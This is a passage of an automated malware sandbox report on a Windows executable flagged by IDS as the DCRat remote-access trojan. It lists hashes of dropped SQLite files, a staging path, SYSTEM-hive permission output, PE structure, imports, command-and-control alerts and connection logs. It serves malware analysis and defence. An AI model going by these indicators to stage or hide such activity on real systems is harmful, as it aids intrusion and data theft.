                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\System32\cacls.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):121
                        Entropy (8bit):4.323081947925383
                        Encrypted:false
                        SSDEEP:3:ohAIQDMCZArMsxo2xRSvFFwIFMW3Gtvn:ohYD+82xmwIyHtv
                        MD5:43B1EC1407EA9C0219A563FFFEEAE780
                        SHA1:C42041802E99A95E6CBAE13E3E20EBFBA3237BB2
                        SHA-256:7E5146BF6F0B6AA61AFD4E3A6031D6DEF0F37523A22D75086B8E0E21D22E4B16
                        SHA-512:5307D7E089BEA4DAC250D0B606C80DF13CCA0A7ECB622BF61B37AD736FFC44EA68F9B993E4743F2AB220FF950E9D9B423524D4E10C0B2D1CE280A7D9B5095DE0
                        Malicious:false
                        Preview:C:\Windows\system32\config\SYSTEM NT AUTHORITY\SYSTEM:F .. BUILTIN\Administrators:F ....
                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                        Entropy (8bit):7.738798470730106
                        TrID:
                        • Win64 Executable GUI (202006/5) 92.65%
                        • Win64 Executable (generic) (12005/4) 5.51%
                        • Generic Win/DOS Executable (2004/3) 0.92%
                        • DOS Executable Generic (2002/1) 0.92%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:bFZYRLnRIz.exe
                        File size:1'939'559 bytes
                        MD5:289f27e7a02f8e76ebf39d2c0c3f09e4
                        SHA1:fb404a7a85d5fb617436f73832e4716556756d6a
                        SHA256:854d267aea33e8dc80021ac043b003ab7c6f99061e56e36572cba3548e6882c9
                        SHA512:38798cc71da6dfd8022dff2be635db8b938ba8d8dc5db8196802af2d9deb26dda145e0e581a6b8eb7022a1e0c33ff34c666cc4817f9f2ac50d1f362f434a75fe
                        SSDEEP:24576:KuDXTIGaPhEYzUzA0Dz46fMR/6Y/M3pPux8KVzVvu9JDcEL0NLpgjdyWhPOePTnK:9Djlabwz9PHMf/M3BuxbzuDQyBPXam0H
                        TLSH:E2950209F39508F8D0F6E2788956C973E7757C4A03619A8F23E56D673E37360AE2A311
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\
                        Icon Hash:97170629070e2d00
                        Entrypoint:0x140032ee0
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x140000000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:2
                        File Version Major:5
                        File Version Minor:2
                        Subsystem Version Major:5
                        Subsystem Version Minor:2
                        Import Hash:b1c5b1beabd90d9fdabd1df0779ea832
                        Instruction
                        dec eax
                        sub esp, 28h
                        call 00007F09B5094208h
                        dec eax
                        add esp, 28h
                        jmp 00007F09B5093B9Fh
                        int3
                        int3
                        dec eax
                        mov eax, esp
                        dec eax
                        mov dword ptr [eax+08h], ebx
                        dec eax
                        mov dword ptr [eax+10h], ebp
                        dec eax
                        mov dword ptr [eax+18h], esi
                        dec eax
                        mov dword ptr [eax+20h], edi
                        inc ecx
                        push esi
                        dec eax
                        sub esp, 20h
                        dec ebp
                        mov edx, dword ptr [ecx+38h]
                        dec eax
                        mov esi, edx
                        dec ebp
                        mov esi, eax
                        dec eax
                        mov ebp, ecx
                        dec ecx
                        mov edx, ecx
                        dec eax
                        mov ecx, esi
                        dec ecx
                        mov edi, ecx
                        inc ecx
                        mov ebx, dword ptr [edx]
                        dec eax
                        shl ebx, 04h
                        dec ecx
                        add ebx, edx
                        dec esp
                        lea eax, dword ptr [ebx+04h]
                        call 00007F09B5093023h
                        mov eax, dword ptr [ebp+04h]
                        and al, 66h
                        neg al
                        mov eax, 00000001h
                        sbb edx, edx
                        neg edx
                        add edx, eax
                        test dword ptr [ebx+04h], edx
                        je 00007F09B5093D33h
                        dec esp
                        mov ecx, edi
                        dec ebp
                        mov eax, esi
                        dec eax
                        mov edx, esi
                        dec eax
                        mov ecx, ebp
                        call 00007F09B5095D47h
                        dec eax
                        mov ebx, dword ptr [esp+30h]
                        dec eax
                        mov ebp, dword ptr [esp+38h]
                        dec eax
                        mov esi, dword ptr [esp+40h]
                        dec eax
                        mov edi, dword ptr [esp+48h]
                        dec eax
                        add esp, 20h
                        inc ecx
                        pop esi
                        ret
                        int3
                        int3
                        int3
                        dec eax
                        sub esp, 48h
                        dec eax
                        lea ecx, dword ptr [esp+20h]
                        call 00007F09B50825B3h
                        dec eax
                        lea edx, dword ptr [00025747h]
                        dec eax
                        lea ecx, dword ptr [esp+20h]
                        call 00007F09B5094E02h
                        int3
                        jmp 00007F09B509AFE4h
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x155a0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x970.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x4676e0x46800f06bb06e02377ae8b223122e53be35c2False0.5372340425531915data6.47079645411382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x480000x128c40x12a002de06d4a6920a6911e64ff20000ea72fFalse0.4499003775167785data5.273999097784603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x5b0000xe75c0x1a000dbdb901a7d477980097e42e511a94fbFalse0.28275240384615385data3.2571023907881185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .pdata0x6a0000x306c0x3200b0ce0f057741ad2a4ef4717079fa34e9False0.483359375data5.501810413666288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .didat0x6e0000x3600x4001fcc7b1d7a02443319f8fcc2be4ca936False0.2578125data3.0459938492946015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        _RDATA0x6f0000x15c0x2003f331ec50f09ba861beaf955b33712d5False0.408203125data3.3356393424384843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .rsrc0x700000x155a00x15600d3a15fc8768566896c13172de43c9931False0.15362298976608188data2.471955605252558IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x860000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        PNG0x705600xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                        PNG0x710a80x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                        RT_ICON0x726540x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 80630 x 80630 px/m0.015778421862060805
                        RT_DIALOG0x82e7c0x2badata0.5286532951289399
                        RT_DIALOG0x831380x13adata0.6560509554140127
                        RT_DIALOG0x832740xf2data0.71900826446281
                        RT_DIALOG0x833680x14adata0.6
                        RT_DIALOG0x834b40x314data0.47588832487309646
                        RT_DIALOG0x837c80x24adata0.6279863481228669
                        RT_STRING0x83a140x1fcdata0.421259842519685
                        RT_STRING0x83c100x246data0.41924398625429554
                        RT_STRING0x83e580x1a6data0.514218009478673
                        RT_STRING0x840000xdcdata0.65
                        RT_STRING0x840dc0x470data0.3873239436619718
                        RT_STRING0x8454c0x164data0.5056179775280899
                        RT_STRING0x846b00x110data0.5772058823529411
                        RT_STRING0x847c00x158data0.4563953488372093
                        RT_STRING0x849180xe8data0.5948275862068966
                        RT_STRING0x84a000x1c6data0.5242290748898678
                        RT_STRING0x84bc80x268data0.4837662337662338
                        RT_GROUP_ICON0x84e300x14data1.25
                        RT_MANIFEST0x84e440x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333
                        DLLImport
                        KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                        OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                        gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc
                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        06/23/24-06:54:21.035775TCP2850862ETPRO TROJAN DCRat Initial Checkin Server Response M4804974592.53.96.121192.168.2.4
                        06/23/24-06:56:28.389945TCP2850862ETPRO TROJAN DCRat Initial Checkin Server Response M4804977392.53.96.121192.168.2.4
                        06/23/24-06:55:24.045906TCP2850862ETPRO TROJAN DCRat Initial Checkin Server Response M4804976292.53.96.121192.168.2.4
                        06/23/24-06:57:31.268133TCP2850862ETPRO TROJAN DCRat Initial Checkin Server Response M4804978492.53.96.121192.168.2.4
                        TimestampSource PortDest PortSource IPDest IP
                        Jun 23, 2024 06:54:14.577907085 CEST49731443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:14.578022003 CEST44349731104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:14.578123093 CEST49731443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:14.579855919 CEST49731443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:14.579895020 CEST44349731104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:15.064431906 CEST44349731104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:15.064523935 CEST49731443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:15.067174911 CEST49731443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:15.067197084 CEST44349731104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:15.067600012 CEST44349731104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:15.117496967 CEST49731443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:15.157426119 CEST49731443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:15.157455921 CEST49731443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:15.157602072 CEST44349731104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:15.515945911 CEST44349731104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:15.516305923 CEST44349731104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:15.516402006 CEST49731443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:15.527344942 CEST49731443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:15.527380943 CEST44349731104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:15.527407885 CEST49731443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:15.527426004 CEST44349731104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:15.534301043 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:15.534393072 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:15.534466982 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:15.534926891 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:15.534965038 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.029215097 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.029303074 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.031089067 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.031115055 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.031470060 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.034159899 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.034193993 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.034380913 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.420289040 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.420542002 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.420617104 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.420630932 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.420684099 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.420798063 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.420841932 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.420866013 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.421125889 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.421180964 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.421202898 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.421246052 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.421278954 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.424935102 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.424998999 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.425014973 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.474235058 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.474262953 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.512130022 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.512192965 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.512211084 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.512336969 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.512408018 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.512422085 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.512634039 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.512693882 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.512778997 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.512815952 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.512841940 CEST49732443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.512857914 CEST44349732104.21.90.18192.168.2.4
                        Jun 23, 2024 06:54:16.610955000 CEST49734443192.168.2.4104.21.90.18
                        Jun 23, 2024 06:54:16.611035109 CEST44349734104.21.90.18192.168.2.4
